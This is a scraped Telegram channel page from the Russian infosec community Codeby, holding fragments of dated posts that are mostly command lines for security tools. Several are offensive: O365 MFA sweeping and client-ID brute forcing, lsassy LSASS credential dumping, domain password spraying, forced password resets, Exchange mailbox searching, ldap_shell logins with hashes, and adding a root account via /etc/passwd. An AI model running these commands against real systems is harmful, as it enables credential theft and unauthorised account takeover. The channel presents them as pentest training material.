Codeby - это крупнейшее ИБ сообщество в русскоязычном сегменте. Если вы интересуетесь информационной безопасностью и этичным хакингом, то этот канал идеально подойдет для вас. Здесь вы сможете получить обучение по вопросам ИБ, участвовать в соревнованиях CTF и пентестировании. Канал также предлагает возможность общения в чате @codeby_one, посещения форума codeby.
et, обучения на codeby.school, а также участия в CTF на codeby.games. Не забывайте следить за новостями сообщества на VK по ссылке vk.com/codeby и на YouTube по ссылке clck.ru/XG99c. Если у вас есть предложения о сотрудничестве, вы всегда можете обратиться к администратору канала по контакту @cdbwzrd. Присоединяйтесь к Codeby и узнавайте все о мире информационной безопасности!
17 Feb, 09:04
17 Feb, 07:02
Invoke-GraphAPIAuth
)Invoke-AzureManagementAPIAuth
)Invoke-EWSAuth
)Invoke-O365WebPortalAuth
)Invoke-O365ActiveSyncAuth
)Invoke-ADFSAuth
)Invoke-MFASweep -Username [email protected] -Password Winter2025 -WriteTokens
Invoke-MFASweep -Username [email protected] -Password Winter2025 -Recon -IncludeADFS
Invoke-BruteClientIDs -Username [email protected] -Password Winter2025 -WriteTokens
15 Feb, 09:00
14 Feb, 16:04
14 Feb, 12:21
x8 -u "https://example.de/" -w [PATH_TO_WORDLIST]
x8 -u "https://example.de/" -X POST -w [PATH_TO_WORDLIST]
x8 -u "https://example.de/" -X POST -b '{"x":{%s}}' -w [PATH_TO_WORDLIST]
14 Feb, 07:02
python3 -m pip install lsassy
lsassy -d dom.lab -u user -p pass 192.168.1.0/24
lsassy -d hackn.lab -u user -p pass dc.dom.lab -m procdump -O procdump_path=/opt/Sysinternals/procdump.exe
lsassy -d hackn.lab -u user -p pass dc.dom.lab -K '/tmp/kerberos_tickets'
lsassy -d hackn.lab -u pixis -p P4ssw0rd dc01.hackn.lab -M '/tmp/keys.txt'
13 Feb, 09:00
13 Feb, 07:04
wget https://github.com/aquasecurity/trivy/releases/download/v0.59.1/trivy_0.59.1_Linux-64bit.deb
dpkg -i trivy_0.59.1_Linux-64bit.deb
sudo apt install trivy
trivy image image_name
trivy fs ./
trivy image --severity HIGH,CRITICAL image_name
trivy k8s --output report.txt k8s_name
12 Feb, 15:09
12 Feb, 09:03
11 Feb, 16:01
11 Feb, 09:03
11 Feb, 07:02
chgpass.exe -t target_user -m newpassword123 -u admin -p adminpassword -d mydomain.local -c dc1.mydomain.local
chgpass.exe -t localuser1 -m Superp@ss! -l remoteserver
chgpass.exe -t localuser1 -m newpassword123 -u admin -p adminpassword -d mydomain.local -c dc1.mydomain.local -l remoteserver
chgpass.exe -t **DSRM** -m "" -u admin -p adminpassword -d mydomain.local -c dc1.mydomain.local
10 Feb, 16:14
Invoke-GlobalMailSearch -ImpersonationAccount current-username -ExchHostname Exch01 -OutputCsv global-email-search.csv
Invoke-SelfSearch -Mailbox [email protected]
10 Feb, 12:42
Invoke-DomainPasswordSpray -Password passwd
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
Get-DomainUserList -Domain domainname -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii userlist.txt
10 Feb, 07:04
Import-Module .\adPEAS.ps1
Invoke-adPEAS
Invoke-adPEAS -Domain 'contoso.com' -Server 'dc1.contoso.com'
Invoke-adPEAS -Module ..
09 Feb, 16:11
09 Feb, 11:40
08 Feb, 13:36
08 Feb, 09:08
07 Feb, 17:38
07 Feb, 12:53
git clone https://github.com/gatariee/gocheck
cd gocheck
make [windows / win64 / win32]
07 Feb, 07:08
git clone https://github.com/PShlyundin/ldap_shell.git
cd ldap_shell
python3 -m pip install .
ldap_shell domain.local/user:password -dc-ip IP
ldap_shell domain.local/user -hashes LMHASH:BTHASH
ldap_shell -k -no-pass domain.local/user -dc-host dc.dom.local
05 Feb, 12:21
05 Feb, 07:03
04 Feb, 09:06
04 Feb, 07:02
03 Feb, 16:23
03 Feb, 09:02
03 Feb, 07:17
git clone https://github.com/jokob-sk/NetAlertX
cd NetAlertX/install
sudo bash install.debian.sh
sudo bash start.debian.sh
http://localhost:20211
. Перейдя по ссылке, пользователь, перемещаясь по левому боковому меню, может получить информацию о количестве устройств подключенных к сети, топологии сети с детальным описанием, доступ к различным сетевым сканерам и многое другое. 01 Feb, 13:23
01 Feb, 09:04
31 Jan, 12:07
/etc/passwd
для добавления учетной записи root. 31 Jan, 07:07
apt install age
age-keygen -o key.txt
age -o 1.txt.age -r age19sshphwjgzxfrf7vees2w0jjzud8yuhagszaua5qtjkcqswmjquseftt5t 1.txt
age -d -i key.txt 1.txt.age > 1.txt
age -o 1.txt.age -p 1.txt
age -d 1.txt.age > 1.txt
age -o 1.txt.age -r age19sshphwjgzxfrf7vees2w0jjzud8yuhagszaua5qtjkcqswmjquseftt5t \
-r age1muklnc9kjypktglzpgalc78g67spdt9wvtkv8vyu03ewpdaypv3qdsye0x
age -d -i key.txt 1.txt.age > 1.txt
age -d -i key1.txt 1.txt.age > 1.txt
30 Jan, 16:26
linpeas_fat.sh
, linpeas.sh
и linpeas_small.sh
:linpeas_fat.sh
: содержит все проверки, даже сторонние приложения в формате base64.linpeas.sh
— linPEAS по умолчанию. Содержит все проверки, но встроен только сторонний linux exploit suggester.linpeas_small.sh
: содержит только самые важные проверки, благодаря чему уменьшается его размер.sudo apt install peass
. Она установит все вариации linPEAS и winPEAS. linpeas
и нас перемещает в директорию со скачанными скриптами../linpeas.sh
sudo -l
и для подбора паролей других пользователей;30 Jan, 10:08
19 Oct, 09:00
18 Oct, 10:02
18 Oct, 08:50
# tshark -f "tcp port 80" -i <ваша сетевая карта>
-i
. Сущетсвует версия с графическим интерфейсам, более удобная для тех, кто не привык к работе в терминале. 12 Oct, 09:01
11 Oct, 08:10
# apt-get install lynis
$ lynis audit system remote <IP>
09 Oct, 12:10
08 Oct, 18:11
08 Oct, 13:01